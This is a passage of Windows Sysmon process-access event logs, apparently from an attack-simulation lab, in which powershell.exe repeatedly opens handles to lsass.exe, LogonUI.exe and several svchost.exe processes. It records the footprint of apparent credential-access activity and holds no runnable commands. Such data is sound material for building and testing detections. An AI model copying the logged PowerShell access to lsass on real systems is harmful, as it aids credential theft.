C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b294b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b2884|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b335c|UNKNOWN(00007FFF44CB3F41)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:36.938","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-001034380100}","SourceProcessId":"2096","SourceThreadId":"2796","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010BCB40000}","TargetProcessId":"1100","TargetImage":"C:\\Windows\\system32\\LogonUI.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b294b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b2884|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b335c|UNKNOWN(00007FFF44CB3F41)","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1109,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:36.938\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-001034380100}\r\nSourceProcessId: 2096\r\nSourceThreadId: 2796\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b294b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b2884|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b335c|UNKNOWN(00007FFF44CB3F41)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:36.938","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-001034380100}","SourceProcessId":"2096","SourceThreadId":"2796","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b294b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b2884|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b335c|UNKNOWN(00007FFF44CB3F41)","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1110,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:36.938\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-001034380100}\r\nSourceProcessId: 2096\r\nSourceThreadId: 2796\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nTargetProcessId: 612\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b294b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b2884|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b335c|UNKNOWN(00007FFF44CB3F41)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:36.938","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-001034380100}","SourceProcessId":"2096","SourceThreadId":"2796","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","TargetProcessId":"612","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b294b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b2884|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b335c|UNKNOWN(00007FFF44CB3F41)","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1111,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:36.938\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-001034380100}\r\nSourceProcessId: 2096\r\nSourceThreadId: 2796\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010C0A90000}\r\nTargetProcessId: 996\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b294b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b2884|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b335c|UNKNOWN(00007FFF44CB3F41)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:36.938","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-001034380100}","SourceProcessId":"2096","SourceThreadId":"2796","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010C0A90000}","TargetProcessId":"996","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b294b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b2884|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b335c|UNKNOWN(00007FFF44CB3F41)","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1112,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:36.938\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-001034380100}\r\nSourceProcessId: 2096\r\nSourceThreadId: 2796\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010A5B80000}\r\nTargetProcessId: 1132\r\nTargetImage: C:\\Windows\\System32\\svchost.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b294b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b2884|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b335c|UNKNOWN(00007FFF44CB3F41)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:36.938","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-001034380100}","SourceProcessId":"2096","SourceThreadId":"2796","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010A5B80000}","TargetProcessId":"1132","TargetImage":"C:\\Windows\\System32\\svchost.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b294b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b2884|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b335c|UNKNOWN(00007FFF44CB3F41)","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1113,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:36.938\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-001034380100}\r\nSourceProcessId: 2096\r\nSourceThreadId: 2796\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010D6B80000}\r\nTargetProcessId: 1144\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b294b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b2884|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b335c|UNKNOWN(00007FFF44CB3F41)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:36.938","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-001034380100}","SourceProcessId":"2096","SourceThreadId":"2796","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010D6B80000}","TargetProcessId":"1144","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b294b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b2884|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b335c|UNKNOWN(00007FFF44CB3F41)","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1114,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:36.938\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-001034380100}\r\nSourceProcessId: 2096\r\nSourceThreadId: 2796\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010E7C30000}\r\nTargetProcessId: 1220\r\nTargetImage: C:\\Windows\\System32\\svchost.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b294b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b2884|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b335c|UNKNOWN(00007FFF44CB3F41)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:36.938","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-001034380100}","SourceProcessId":"2096","SourceThreadId":"2796","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010E7C30000}","TargetProcessId":"1220","TargetImage":"C:\\Windows\\System32\\svchost.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b294b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b2884|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b335c|UNKNOWN(00007FFF44CB3F41)","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1115,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:36.938\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-001034380100}\r\nSourceProcessId: 2096\r\nSourceThreadId: 2796\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010EDC30000}\r\nTargetProcessId: 1224\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b294b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b2884|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b335c|UNKNOWN(00007FFF44CB3F41)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:36.938","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-001034380100}","SourceProcessId":"2096","SourceThreadId":"2796","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010EDC30000}","TargetProcessId":"1224","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b294b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b2884|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b335c|UNKNOWN(00007FFF44CB3F41)","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1116,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:36.938\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-001034380100}\r\nSourceProcessId: 2096\r\nSourceThreadId: 2796\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010D4CB0000}\r\nTargetProcessId: 1308\r\nTargetImage: C:\\Windows\\System32\\svchost.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b294b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b2884|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b335c|UNKNOWN(00007FFF44CB3F41)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:36.938","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-001034380100}","SourceProcessId":"2096","SourceThreadId":"2796","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010D4CB0000}","TargetProcessId":"1308","TargetImage":"C:\\Windows\\System32\\svchost.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3364bd|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b3a5c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b294b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc